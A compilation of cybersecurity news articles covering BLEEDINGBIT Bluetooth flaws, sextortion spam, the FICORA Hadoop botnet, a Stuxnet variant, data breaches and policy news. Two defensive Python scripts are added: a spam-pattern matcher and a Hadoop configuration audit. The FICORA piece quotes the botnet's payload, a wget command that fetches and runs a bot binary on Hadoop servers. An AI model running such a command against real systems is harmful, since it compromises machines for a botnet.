“Armis has identified two chip-level vulnerabilities impacting access points and potentially other unmanaged devices. Dubbed “BLEEDINGBIT,” they are two critical vulnerabilities related to the use of BLE (Bluetooth Low Energy) chips made by Texas Instruments (TI).” reads the post published by Armis.

“The chips are embedded in, among other devices, certain access points that deliver Wi-Fi to enterprise networks manufactured by Cisco, Meraki and Aruba. These are the leaders in networking, and accounting for nearly 70% of the market.”

The exact number of affected devices is not yet known; Cisco and Aruba Networks are estimated to supply 70% of the wireless access points sold to enterprises every year.

The BLEEDINGBIT vulnerabilities affect several Texas Instruments chips. The CVE-2018-16986 flaw affects CC2640 and CC2650 chips running BLE-STACK 2.2.1 and earlier, and CC2640R2 running version 1.0 or earlier.

The flaw affects several Cisco Aironet and Meraki MR access points; an attacker can exploit it only if the device is actively scanning.

An attacker in range of the targeted device can trigger the flaw for remote code execution. If BLE is enabled and the device is actively scanning, an attacker can send specially crafted packets in order to trigger a memory overflow and execute arbitrary code.

“The security vulnerability for CVE-2018-16986 is present in these TI chips when scanning is used (e.g. observer role or central role that performs scanning)” continues the post.

An attacker could trigger the flaw to install a backdoor on the chip and then gain full control of the vulnerable device. Experts warn that, having compromised an access point, the attacker can spread to other devices on the network.


The second flaw, tracked as CVE-2018-7080, affects CC2642R2, CC2640R2, CC2640, CC2650, CC2540 and CC2541 chips. The flaw can only be exploited if the device using the chip has the over-the-air firmware download (OAD) feature enabled.

“The vulnerability for CVE-2018-7080 affects any of the following TI’s BLE chips provided the vendor choose to include the OAD feature in his device.” continues the post.

The second flaw could be exploited to deliver a malicious update to the targeted AP and overwrite the operating system.

Experts pointed out that all Aruba access points share the same OAD password, which can be obtained by intercepting a legitimate update or by reverse engineering the device. According to Aruba, the flaw can be triggered only if the BLE radio has been turned on.

“A vulnerability exists in the firmware of embedded BLE radios that are part of some Aruba access points. An attacker who is able to exploit the vulnerability could install new, potentially malicious firmware into the AP’s BLE radio and could then gain access to the AP’s console port.” reads the advisory published by Aruba.

Armis notified all affected vendors about the flaws; Texas Instruments released BLE-STACK version 2.2.2 to address the CVE-2018-16986 flaw. Both Cisco and Aruba have also released security patches for affected products.

“Vulnerabilities which allow attackers to spread over the air between devices pose a tremendous threat to any organization or individual. Current security measures, including endpoint protection, mobile data management, firewalls, and network security solution are not designed to identify these type of attacks, and related vulnerabilities and exploits, as their main focus is to block attacks that can spread via IP connections.” concludes Armis.

“New solutions are needed to address the new airborne attack vector, especially those that make air gapping and network segmentation irrelevant. Additionally, there will need to be more attention and research as new protocols are using for consumers and businesses alike. With the large number of desktop, mobile, and IoT devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. This is the primary mission of Armis in this new connected device age.”

‘Aaron Smith’ Sextortion scam campaigns hit tens of thousands of individuals
2.11.2019 securityaffairs

Security experts from Cisco Talos have uncovered two recent sextortion scam campaigns that appear to leverage the Necurs botnet infrastructure.
Experts from Cisco Talos analyzed the two campaigns; one of them began on August 30, the other on October 5. The researchers named them the 'Aaron Smith' sextortion scams after the From: header of the messages.

Attackers use data from numerous data breaches to carry out their campaigns. In October, researchers from Cybaze ZLab spotted a scam campaign targeting some of the firm's Italian customers in which the crooks leveraged credentials from the Breach Compilation archive.

Crooks use email addresses and cracked passwords obtained through phishing attacks and data breaches to send scam emails to potential victims, claiming to possess videos of the recipients watching explicit content.

The scammer demands a payment in cryptocurrency for not sharing the video.


Cisco Talos experts reported that the Aaron Smith campaigns sent out a total of 233,236 sextortion emails from 137,606 unique IP addresses.

“Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days’ worth of spam.” reads the analysis published by Talos.

“Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}Smith@yahoo\.jp/
From =~ /Aaron@Smith\d{3}\.edu/

In total, SpamCop received 233,236 sextortion emails related to these “Aaron Smith” sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.”


Top countries sending sextortion emails include Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent).

According to Talos, the number of distinct email addresses targeted in the campaigns was 15,826, with each recipient receiving an average of 15 sextortion messages. In one case, a single recipient received 354 messages.
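The Talos measurements above (matching the two From: patterns, then counting messages per sending IP and per recipient) can be reproduced on a mail log with a few lines of Python. The script below is an added example, not Talos's own tooling; the message tuples are constructed sample data, and the two regular expressions are the ones quoted from the Talos post.

```python
import re
from collections import Counter

# The two From: header patterns Talos reported for the "Aaron Smith" campaigns.
AARON_SMITH_PATTERNS = [
    re.compile(r"Aaron\d{3}Smith@yahoo\.jp"),
    re.compile(r"Aaron@Smith\d{3}\.edu"),
]

# Constructed sample log: (sending IP, From: header, recipient). Not real data;
# the IPs are from documentation ranges.
SAMPLE_MESSAGES = [
    ("203.0.113.10", "Aaron123Smith@yahoo.jp", "alice@example.org"),
    ("203.0.113.10", "Aaron@Smith456.edu", "alice@example.org"),
    ("203.0.113.10", "Aaron987Smith@yahoo.jp", "bob@example.org"),
    ("198.51.100.7", "Aaron@Smith001.edu", "alice@example.org"),
    ("198.51.100.8", "Aaron@Smith002.edu", "carol@example.org"),
    ("192.0.2.44", "newsletter@example.com", "alice@example.org"),  # benign mail
    ("192.0.2.45", "Aaron12Smith@yahoo.jp", "bob@example.org"),     # only two digits: no match
]


def is_aaron_smith(from_header):
    """True when the From: header matches either campaign pattern."""
    return any(p.search(from_header) for p in AARON_SMITH_PATTERNS)


def summarize(messages):
    """Tally campaign mail the way the Talos write-up does: per sender IP and per recipient."""
    matched = [m for m in messages if is_aaron_smith(m[1])]
    per_ip = Counter(ip for ip, _, _ in matched)
    per_recipient = Counter(rcpt for _, _, rcpt in matched)
    # Share of sending IPs that sent two or fewer messages (Talos: 87.7 percent).
    low_volume_ips = sum(1 for n in per_ip.values() if n <= 2)
    return {
        "messages": len(matched),
        "unique_ips": len(per_ip),
        "low_volume_ip_share": low_volume_ips / len(per_ip) if per_ip else 0.0,
        "unique_recipients": len(per_recipient),
        "avg_per_recipient": len(matched) / len(per_recipient) if per_recipient else 0.0,
        "max_per_recipient": max(per_recipient.values(), default=0),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_MESSAGES).items():
        print(f"{key}: {value}")
```

On the sample data five of the seven messages match, coming from three sending IPs, two of which sent two or fewer messages; the most-targeted recipient received three. A high share of low-volume senders is the signature of a botnet-sourced campaign rather than a few bulk mailers, which is why per-IP rate limiting alone does little against it.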

Each sextortion spam message includes a payment demand that randomly varies from $1,000 up to $7,000.

“These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.” continues Talos.

Researchers discovered that about 1,000 sending IP addresses used in the Aaron Smith campaigns were also involved in another sextortion campaign analyzed by experts from IBM X-Force in September and that leveraged the Necurs botnet too.

The campaigns allowed the crooks to earn a total of 23.3653711 bitcoins (roughly $146,380.31); the payments were distributed across 58,611 unique bitcoin wallet addresses.

Only 83 of these wallets had active balances; in some cases the wallets received payments smaller than $1,000, which suggests they were also used in other spam campaigns.

“Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users’ email inboxes, many of them may not be educated enough to identify that it’s a scam designed to make them give away their bitcoins.” concludes Talos.

“Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.”

Further technical details and IoCs are included in the analysis published by Talos.

0x20k of Ghost Squad Hackers Releases 0Day Exploit Targeting Apache Hadoop
1.11.2019 securityaffairs

0x20k of Ghost Squad Hackers has released the full source code of the 0day exploit used to target Apache Hadoop and build the FICORA Botnet.
In direct response to the publication of Radware's analysis of the newly discovered DemonBot malware strain affecting Hadoop clusters earlier in the week, on October 25th, 2018, 0x20k of Ghost Squad Hackers released the full source code of the 0day exploit used to build his newest model, the FICORA Botnet. 0x20k, who is also credited as the author of the Yasaku Botnet, is a co-author of the 0day exploit provided below.

Unlike DemonBot, which is credited with infecting 70 servers to date, 20k claims to have infected over 1,000, with the potential for pulling over 350 Gbps, verified through Voxility.


According to 20k, also known as URHARMFUL, the author of the now infamous DemonBot malware strain got his source code from one of the authors of Owari, stealing it off his servers before dumping it online in September 2018. In this way DemonBot's "accolades" are going to the wrong person, which is why 20k decided to release his exploit in the wild to verify ownership before anyone tries to steal it away from him. 20k has also released several videos of him testing out various attacks on different servers and services, including OVH, NFO, ProxyPipe, and Mineplex, allegedly pulling anywhere from 110 Gbps to 200 Gbps.

In terms of how the two bots operate, they are extremely different. For example, DemonBot infects through port 6982 on either 22 or 23 depending on the availability of Python or Perl and telnetd on the device/server.

FICORA, by contrast, infects through port 8088. The DDoS attack vectors supported by DemonBot are UDP and TCP floods, whereas FICORA uses a URG flood on TCP /32. Moreover, DemonBot is just a renamed version of Lizkebab, whereas FICORA is similar to Mirai but has different functions.


Full 0Day Exploit:

Rogue Security Labs has reached out to several of the affected services to confirm the validity of the attacks. While OVH declined to comment on the matter, John aka Edge100x, President and CEO of NFO confirmed each and every attack targeting their servers – of which there were 3. ProxyPipe, on the other hand, took a defensive stance to my emails, claiming that their servers have never been crashed, and that the company has never seen anything near 200 GBPS.

In response to the DoS attack faced by NFO, John said "The 110 Gbps number is likely from our website https://www.nfoservers.com/networklocations.php" (which it was), adding that "It is common for attackers to reference that site and assume that they generated that much traffic when they are able to trigger a null-route, though that's not what it actually means." He did not confirm or deny whether the FICORA botnet could pull that much traffic; he only noted that hitting the IPs listed on YouTube wouldn't necessarily give the botnet owner an accurate reading of the traffic generated. He did say those IPs were certainly crashed on the selected dates.

How The Exploit Works:
Upon analysis, Steve Loughran, a software developer specializing in Apache Hadoop, told Rogue Security that “If this is happening on a YARN cluster where Kerberos is enabled, then somehow there’s a weakness in the YARN REST API where SPNEGO-authenticated verification of caller identity has failed. This is something we can look at and address. Or it could be something is playing with default passwords for management tools and using that to gain permission.” Explaining that “It’s as if the cluster had telnet or rlogin enabled without password checks.”

However, as 20k explains “FICORA contains telnet, ssh and hadoop servers.” For telnet they “used dictionary style brute-force, same as ssh, hadoop pulled the biggest amount of packets.” 20k added that it was a Remote Code Execution bug that allowed him to execute x86 binary in Hadoop’s directory /tmp.

So the payload was basically cd /tmp; wget http://botet.server/x86; chmod 777 x86; ./x86 hadoop.x86

Perhaps most importantly, as 20k even explains in the release of the exploit “we already bricked this exploit so good luck on pulling them.” For Hadoop developers this is particularly troubling. According to Mr. Loughran, all Apache can do for this problem is “issue advisories for clusters to turn on Kerberos.” Adding that “For this particular cluster, turning off the YARN API may break things, but if the malware depends on its existence (and known HTTP port), reset this property in yarn-site.xml to its default value, false.”


“That may temporarily slow it down —albeit at the risk of breaking apps which depend on it— but if the malware can issue Hadoop RPC calls to YARN it can still submit work, or, as the HDFS filesystem will be equally unprotected, come in via the FS.”

Based on the script, Loughran notes that the exploit "isn't a remote code execution bug, it is a remote job submission." As of today, 10/31/2018, Apache is actively trying to figure out "if there's some actual exploit of the Hadoop REST APIs even when security is enabled, or whether this is a case of a Hadoop cluster without security turned on is running somebody else's code." No patch for the exploit is known to exist, and, as Mr. Loughran admits, since the exploit uses ssh ports to run brute-force dictionary attacks against foundational Linux servers, the fix is potentially "out of our scope."

With that said, however, developers at Hadoop claim that the exploit listed above is "not a zero-day exploit." More likely, they say, it is "an attack which schedules work on unsecured Hadoop clusters visible on the network." Even so, Loughran cannot yet say exactly how the code works or compromises devices: "it may be that there is a real vulnerability in systems with Kerberos enabled. if that turns out to be the case, yes, that's a 0-day."

The fix for now he says? “turn security on, don’t make your systems visible on the internet. indeed, keep in a private subnet with restricted access, if at all possible.”
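Loughran's advice ("turn security on" and keep the cluster off the open network) maps onto a handful of settings in Hadoop's core-site.xml and yarn-site.xml. The audit script below is an added example, not Hadoop's or the article's own code. It assumes the usual meaning of those settings: hadoop.security.authentication must be kerberos, hadoop.security.authorization must be true, and yarn.resourcemanager.webapp.address (the REST endpoint on port 8088 that FICORA scans for) should not bind every interface. The two configuration fragments are constructed: the first is the weak configuration, the second the corrected one.

```python
import xml.etree.ElementTree as ET

# Constructed example of a cluster with security left off (the weak configuration).
WEAK_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
  <property><name>hadoop.security.authorization</name><value>false</value></property>
</configuration>"""

WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
</configuration>"""

# The corrected counterpart: Kerberos on, service-level authorization on, and the
# ResourceManager web/REST endpoint bound to an internal hostname (constructed name).
HARDENED_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
</configuration>"""

HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>rm.internal.example:8088</value></property>
</configuration>"""


def parse_hadoop_xml(text):
    """Return {property name: value} from a Hadoop *-site.xml document."""
    root = ET.fromstring(text)
    props = {}
    for prop in root.findall("property"):
        name = prop.findtext("name")
        value = prop.findtext("value")
        if name is not None:
            props[name.strip()] = (value or "").strip()
    return props


def audit(core_props, yarn_props):
    """Return a list of findings; an empty list means the checked settings are sound."""
    findings = []
    # Hadoop's own default for authentication is "simple", i.e. no authentication at all.
    auth = core_props.get("hadoop.security.authentication", "simple").lower()
    if auth != "kerberos":
        findings.append(
            "hadoop.security.authentication is '%s': anyone who can reach YARN can submit work" % auth
        )
    if core_props.get("hadoop.security.authorization", "false").lower() != "true":
        findings.append("hadoop.security.authorization is not true: service-level ACLs are not enforced")
    # Assumption: an unset address falls back to the ResourceManager hostname default (0.0.0.0).
    webapp = yarn_props.get("yarn.resourcemanager.webapp.address", "")
    host = webapp.rsplit(":", 1)[0] if webapp else ""
    if host in ("", "0.0.0.0"):
        findings.append(
            "yarn.resourcemanager.webapp.address binds all interfaces: port 8088 is reachable from every network"
        )
    return findings


if __name__ == "__main__":
    for label, core, yarn in (("weak", WEAK_CORE_SITE, WEAK_YARN_SITE),
                              ("hardened", HARDENED_CORE_SITE, HARDENED_YARN_SITE)):
        result = audit(parse_hadoop_xml(core), parse_hadoop_xml(yarn))
        print(label, "->", result or "no findings")
```

Run against real files (for example /etc/hadoop/conf/core-site.xml and yarn-site.xml) the same two functions apply unchanged; binding the web endpoint to an internal name is only a complement to, not a substitute for, the firewall or private subnet Loughran recommends.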

Iran hit by a more aggressive and sophisticated Stuxnet version
1.11.2019 securityaffairs

Iran's strategic network was hit by a new destructive and sophisticated version of the Stuxnet cyber weapon, Hadashot TV reports.
According to the Hadashot TV, Iran’s strategic network was hit by a destructive malware-based attack hours after Israel revealed the Mossad had thwarted an Iranian murder plot in Denmark, and days after Iran’s President Hassan Rouhani’s phone was tapped.

Attackers used malware similar to Stuxnet, the cyber weapon that hit the Iranian nuclear plant at Natanz in 2010, interfering with the Iranian government's nuclear program.

“Remember Stuxnet, the virus that penetrated the computers of the Iranian nuclear industry?” reported Hadashot TV.

“Iran has admitted in the past few days that it is again facing a similar attack, from a more violent, more advanced and more sophisticated virus than before, that has hit infrastructure and strategic networks.”

Stuxnet is the product of a joint operation conducted by the US and Israeli intelligence agencies along with the alleged help of GCHQ.

The malicious code used in the recent attacks is “more violent, more advanced and more sophisticated,” and Iran blames Israel for the offensive.

Israeli officials are not commenting on the attack; in recent months the Mossad intelligence agency has conducted several operations against Iran. Early this year the cyberspies smuggled a huge trove of documents (paper and digital files) detailing Iran's clandestine nuclear weapons program out of the Islamic Republic with the help of Iranian agents.

In September, Prime Minister Benjamin Netanyahu presented at the UN the alleged details of the Iranian government's nuclear activity inside Iran, in Syria, and in Lebanon.

A few days ago, Gholamreza Jalali, the head of Iran's civil defense agency, confirmed that government experts have uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day.

Iran’s Supreme Leader Ayatollah Ali Khamenei calls for action against the intensified efforts of Iran’s enemies in “infiltrating” his country.

“In the face of the enemy’s complex practices, our civil defense should … confront infiltration through scientific, accurate, and up-to-date … action,” Ayatollah Khamenei told civil defense officials, who are in charge of areas including cyber defense.

85 Million Voter Records Available for Sale Ahead of the 2018 US Midterm Elections
1.11.2019 securityaffairs

Ahead of the 2018 US midterm elections, sellers are flooding the cybercrime underground markets with data from voter databases.
Experts at cybersecurity company Carbon Black found tens of different state voter databases available for sale on the dark web.

“Carbon Black researchers found 20 different state voter databases available for purchase on the dark web, several from swing states.” reads the report published by Carbon Black.

“Critical information in these offerings included voter IDs, full names, current / previous addresses, genders, phone numbers and citizenship status, among other information.”


Such data exposes voters to sophisticated identity theft. Experts found records on more than 81,534,624 voters from 20 states. Most of the records belong to New York (15 million voters) and Florida (12.5 million), and they have been on sale since September 1.


Experts warn of the availability in the Dark Web of information and commodities that could be used to interfere with elections.

“Thousands of Instagram followers, Facebook likes, YouTube views and Twitter retweets are available for a small amount of cryptocurrency on the dark web. Some listings focus on selling “laser-focused” ads to make sure a message gets across to the recipients — most likely to respond to a campaign.” continues the report.

“Manipulating social media is a relatively low-cost endeavor, and hackers on the dark web appear to have tools at the ready for manipulating public opinion on major American platforms.”

Experts also discovered many hackers and hacking crews for hire that offer to target government organizations for several malicious purposes.

“Some of the hackers and hacking teams “offer to target government entities for the purposes of database manipulation, economic/corporate espionage, DDoS attacks, and botnet rentals.” states the report.

These services have a varying price that goes from hundreds to thousands of dollars per target.

According to the firm, election-focused cyberattacks pose real threats to Western political institutions. Sixty-eight percent of survey respondents, among the top cybersecurity professionals in the world, believe the upcoming US midterm elections will be influenced by cyberattacks.

Cyber attacks carried out by nation-state actors are even more sophisticated; state-sponsored hackers are turning to political propaganda operations, such as the 2016 Democratic National Committee hack.
Let me close with an alarming figure from the survey conducted by Carbon Black, “1 in 4 voters said they will consider not voting in future elections over cybersecurity fears.”

The Radisson Hotel Group has suffered a data breach
1.11.2019 securityaffairs

The hotel chain Radisson Hotel Group suffered a security breach that exposed personal information of the members of its loyalty scheme.
The hotel chain Radisson Hotel Group suffered a security breach that exposed personal information (name, address (including country of residence), email address, and in some cases, company name, phone number, Radisson Rewards member number, and any frequent flier numbers on file) of the members of its loyalty scheme.

The incident happened on September 11, but the IT staff at the Radisson Hotel Group identified it only on October 1. Once the breach was discovered, the staff promptly locked out the intruders.

The hotel chain Radisson Hotel Group is present in 73 countries and owns several brands including Radisson, Radisson Blu, Radisson Red, Country Inns and Suites by Radisson and Park Inn by Radisson.

The company notified the holders of Radisson Rewards cards of the security breach only yesterday.

Payment info and passwords were exposed due to the incident.

According to the data breach notification email sent by the Radisson Hotel Group the security breach affected only a “small percentage” of the Radisson Rewards members.

Image: Radisson Rewards breach notification (source: Boarding Area website)

“All impacted members accounts have been secured, and flagged to monitor for any potential unauthorised behaviour. While the ongoing risk to your Radisson Rewards account is low, please monitor your account for any suspicious activity.” reads the data breach notification.

“Radisson Rewards takes this incident very seriously and is conducting an ongoing extensive investigation into the incident to help prevent data privacy incidents from happening again in the future.”

At the time of writing, there are no technical details about the data breach.

“The data security incident impacted less than 10 percent of Radisson Rewards member accounts,” a Radisson spokesman told ElReg.

Cardholders should be cautious about potential scams carried out by cybercriminals in possession of the stolen data.

UK Regulator Issues Second GDPR Enforcement Notice on Canadian Firm
31.10.2019 securityweek

On 6 July 2018, the UK's data protection regulator (ICO) issued the first GDPR-related enforcement notice. It was delivered on Canadian firm Aggregate IQ. The notice comments, "The Commissioner has observed with concern the application of techniques hitherto reserved for commercial behavioural advertising being applied to political campaigning, during recent elections and the EU referendum campaign in 2016."

That enforcement notice requires that AIQ should within 30 days "Cease processing any personal data of UK or EU citizens obtained from UK political organisations or otherwise for the purposes of data analytics, political campaigning or any other advertising purposes."

AIQ appealed the notice. In that appeal, AIQ states "the data continues to be held by AggregateIQ for the simple reason that it remains subject to a preservation order made by Canadian officials."

In reality there is no conflict between preserving the data for the Canadian officials and ceasing to process it for the stated purposes. Nevertheless, it seems to have alerted the ICO to the need to account for separate simultaneous legal requirements in different jurisdictions. The ICO has now issued a new enforcement notice (PDF) that "varies and replaces the Notice served on AIQ dated 6 July 2018. The Notice clarifies the steps to be taken by AIQ..."

The requirements of the new notice (two short paragraphs replacing one short paragraph) are effectively the only difference between the two notices.

"AIQ appealed the issue of the Notice on a number of grounds, one of which was the apparent lack of precision as to what AIQ would have to do to comply and also the fact that AIQ was subject to a requirement of the Office of Information and Privacy Commissioner [OIPC] of British Columbia not to destroy data," explains David Flint, senior partner at MacRoberts LLP.

The new requirements include oblique reference to the investigation by the ICO's Canadian counterpart (OIPC) and the Canadian preservation order already on AIQ. The terms must now be acted upon within 30 days of the OIPC "notifying (AIQ) that it is no longer the subject of any investigation by the OIPC, or that the OIPC is content for it to comply with this Notice."

The action required is also slightly different. "Erase any personal data of individuals in the UK, determined by reference to the domain name of the email addresses processed by AIQ, retained on its servers as notified to the Information Commissioner..."

But, comments Flint, "Given that the October Notice states in paragraph 2 that it "clarifies the steps to be taken by AIQ", some lack of clarity remains. What is to happen to the personal data of non-UK data subjects mentioned in the July Notice? What about UK data subjects who have e-mail addresses other than ".co.uk" -- such as outlook.com? Does the "clarification" go beyond the original Notice which had a purpose restriction on the use of the data -- the October Notice seems to be all encompassing."

In short, he adds, "the October Notice may provide some "clarification" but really raises as many questions as it answers."

U.S. Accuses China of Hacking Aerospace, Tech Companies
31.10.2019 securityweek

Chinese intelligence officers recruited hackers and insiders to help them steal sensitive information from aerospace and technology companies, the U.S. Department of Justice said on Tuesday.

An indictment unsealed this week charges ten Chinese nationals over their role in the scheme, including two spies, six hackers and two insiders.

According to U.S. authorities, the operation was coordinated by Zha Rong and Chai Meng, intelligence officers working for the Jiangsu Province Ministry of State Security (JSSD) in the Chinese city of Nanjing. The JSSD is a foreign intelligence arm of China’s Ministry of State Security (MSS), which is responsible for non-military foreign intelligence, domestic counterintelligence, and political and domestic security.

Zha Rong and Chai Meng are said to have recruited five hackers, including Zhang Zhang-Gui, Liu Chunliang, Gao Hong Kun, Zhuang Xiaowei, and Ma Zhiqi, to steal information on a turbofan engine used in commercial airliners in Europe and the United States.

The targeted jet engine was being developed by a French aerospace company, which also had offices in China’s Jiangsu province, in cooperation with a U.S.-based firm.

The hackers targeted the French company via phishing, watering hole attacks, and domain hijacking, but they were also assisted by at least two individuals working at the firm’s Chinese office. Tian Xi allegedly planted a piece of malware received from a JSSD officer on the organization’s computers and Gu Gen, who had been working as the head of IT and security, tipped off the Chinese agency when foreign law enforcement discovered the malware.

In addition to the French aerospace manufacturer, the hackers targeted companies that built parts of the jet engine, including ones based in Massachusetts, Oregon and Arizona. Authorities pointed out that at the time of the attacks, which spanned from at least January 2010 to May 2015, an aerospace company owned by the Chinese government had also been working on a similar engine.

One of the alleged hackers, Zhang Zhang-Gui, has also been accused of working with an individual named Li Xiao as part of a separate hacking operation conducted “for their own criminal ends.” The Justice Department said one of the victims of this attack was a tech company in San Diego from which the hackers attempted to steal commercial information and use its website for a watering hole attack.

The first cyberattack known to U.S. authorities targeted Los Angeles-based Capstone Turbine. The attackers attempted to steal data from the company and use its website as a watering hole.

This is the third round of charges brought against JSSD spies since September. One JSSD officer was extradited to the United States for attempting to steal trade secrets related to jet engines and a U.S. Army recruit was indicted in September for working with a JSSD intelligence officer. None of the individuals targeted in the newly unsealed indictment are in U.S. custody.

“State-sponsored hacking is a direct threat to our national security. This action is yet another example of criminal efforts by the MSS to facilitate the theft of private data for China’s commercial gain,” said U.S. Attorney Adam Braverman. “The concerted effort to steal, rather than simply purchase, commercially available products should offend every company that invests talent, energy, and shareholder money into the development of products.”

Apple Patches Passcode Bypass, FaceTime Flaws in iOS
31.10.2019 securityweek

Security updates released by Apple on Tuesday for its macOS, iOS, tvOS, watchOS, Safari, iCloud and iTunes products address tens of new vulnerabilities.

The advisory published by Apple for macOS lists over 70 CVE identifiers. This includes vulnerabilities affecting third-party components and flaws that were previously addressed by Apple and for which patches were now backported to older versions of the operating system.

The security holes patched this week can be exploited for arbitrary code execution, privilege escalation, information leakage, and denial-of-service (DoS) attacks.

The more interesting vulnerabilities include a crypto issue discovered by a team of researchers from two universities, flaws that allow applications to execute code with elevated privileges, and a user interface spoofing bug in the Mail app. The latest updates for macOS 10.14 Mojave also patch Variant 3a of the speculative execution bugs known as Spectre and Meltdown, and some vulnerabilities discovered by researcher Patrick Wardle, including one disclosed shortly after the launch of Mojave.

Apple has also patched over 20 vulnerabilities in iOS 12. This includes several FaceTime issues discovered by Natalie Silvanovich of Google Project Zero. The researcher found four memory corruptions that could result in data leaks or arbitrary code execution. Some of these flaws allow a remote attacker to execute code by initiating a FaceTime call, Apple said.

iOS 12.1 also resolves two lockscreen bypass vulnerabilities disclosed recently by Jose Rodriguez, known for his YouTube channel videosdebarraquito. Rodriguez found that the passcode can be bypassed on an iPhone by leveraging the VoiceOver (CVE-2018-4387) and Notes (CVE-2018-4388) features. The researcher discovered these weaknesses just days after Apple released patches for similar passcode bypass methods that he had previously found.

Many of the iOS vulnerabilities were also patched by Apple in tvOS and watchOS, both of which are based on the mobile operating system. Some of the flaws were also found to impact Safari and the iTunes and iCloud applications for Windows.

Code analysis firm Semmle on Tuesday disclosed the details of a code execution vulnerability discovered by one of its researchers. Apple first fixed the bug in September with the release of iOS 12 and macOS Mojave, but this week it also backported the patches to macOS Sierra and High Sierra.

Ex-Air Force Airman in New Mexico Accused of Computer Fraud
31.10.2019 securityweek

Prosecutors say a former Air Force airman in New Mexico could be facing up to 10 years in federal prison for computer fraud.

Michael Weber made his initial court appearance Tuesday in Albuquerque.

He remains in federal custody pending Wednesday's preliminary hearing and detention hearing.

Authorities say the 22-year-old Weber was arrested Tuesday morning by FBI agents at a home in Alamogordo.

According to a criminal complaint, Weber allegedly placed a program, information, code or command known as a "spam bot" onto a government-issued cellular phone assigned to his supervisor at Cannon Air Force Base on Jan. 16.

The "spam bot" allegedly caused the cellular phone to receive a long string of messages allegedly intended to cause damage to it.

Proposal for Cybersecurity Civilian Corps Gets Mixed Reception
31.10.2019 securityweek

Although the U.S has been engaged in cybersecurity for over a generation, "there continues to be organizational and human gaps that leave the nation insecure." Few people would disagree. What is less clear is any realistic and effective solution to the problem.

Now the bi-partisan New America think tank, based in Washington D.C. with additional offices in New York City and Oakland, has put forward its own proposal. A new paper, 'The Need for C3 -- A Proposal for a United States Cybersecurity Civilian Corps' (PDF), recommends the formation of a 25,000-strong volunteer force of cybersecurity personnel to cover the whole United States.

Its purpose would be to engage the wider cybersecurity community to tackle core needs that are unlikely to be met through existing structures, thereby improving the overall security ecosystem through three key areas: education and outreach; testing, assessments and exercises; and on-call expertise and emergency response (a sort of cybersecurity parachute brigade).

Although the corps would be populated by unpaid volunteers, it would still need to be enshrined in legislation. Here, New America sees it as an extension and replacement for NETGuard, the National Emergency Technology Guard included in the Homeland Security Act of 2002. "Due to DHS disorganization and disinterest at the time, the NETGuard did not launch, leaving the nation with the gap discussed above," says the paper. Nevertheless, NETGuard could be used as a starting and reference point for the proposed U.S. Cyber Civilian Corps (C3), which should remain under the organizational purview of the DHS.

"Given awareness of both the threats to our nation's cyber posture, as well as the skills shortage, we're at the point where we must try novel approaches," comments David Ginsburg, VP of marketing at Cavirin. "An advantage of a grass-roots effort like the Cyber Civilian Corps would provide local resources and skills if we were in a situation where 'primary responders' were overstretched."

There is little doubt that the basic idea is good -- the main question is whether it is workable. The paper's authors maintain throughout that it is indeed workable, and cite numerous existing volunteer organizations as examples -- such as the 788,250 volunteer firefighters. "They donate their time as a public service," say the authors; "similarly, citizens with a different skill set could work on cybersecurity programs that affect their communities."

But cybersecurity is already a profession in staffing crisis. "There are just under 300,000 open cybersecurity positions in the United States at this time which companies and government are unable to fill," admit the authors; "future needs project as high as one million unfilled positions."

With a small degree of circular argument, finding 25,000 volunteers in an already overstretched workforce is expected to help reduce the overall staff shortage over time. It may -- but gaining enough initial volunteers is going to be difficult. Michigan already has a state-level C3 (unsurprisingly known as MiC3). New America acknowledges that MiC3 is "part inspiration for the national concept," but notes that activation requires a governor-declared state of emergency that has never occurred.

MiC3 was formed in 2013 and draws its members from local companies, universities and civil society. It is open to any Michigan resident who has two years' infosec involvement, can "demonstrate basic knowledge of networking and security concepts, as well as basic IR and forensics skills," and has employer support. In the five years of its existence it has grown to approximately 100 members, which makes the average of 500 members per state envisaged by New America appear somewhat ambitious.

Industry opinion on the value of New America's proposal varies widely. "The proposal for a United States Cybersecurity Civilian Corps is a great idea," comments Joseph Carson, chief security scientist at Thycotic, "and has been something that has been done in Estonia for many years with the 'kaitseliit', also known as the Cyber Defense League. It is a voluntary organization that brings together experts from both military and the corporate world to practice and prepare to defend the country when attacked. Countries are being attacked by cyberattacks more often than ever before today, so it is more important than ever to be prepared."

Nathan Wenzler, chief security strategist at AsTech, takes an opposing view. "The call for a Cybersecurity Civilian Corps seems like an entirely misguided approach to addressing the various issues we face as a society -- including the lack of qualified, well-trained and experienced security professionals that most organizations deal with while trying to defend against a seemingly endless number of attacks from malicious entities."

He points out that most companies are already pushing their understaffed security teams to work more than the typical 40-hour week just to keep up with their own needs. "There's not a lot of hours left in the day to expect that these folks would volunteer their time to participate in this proposed Corps," he told SecurityWeek.

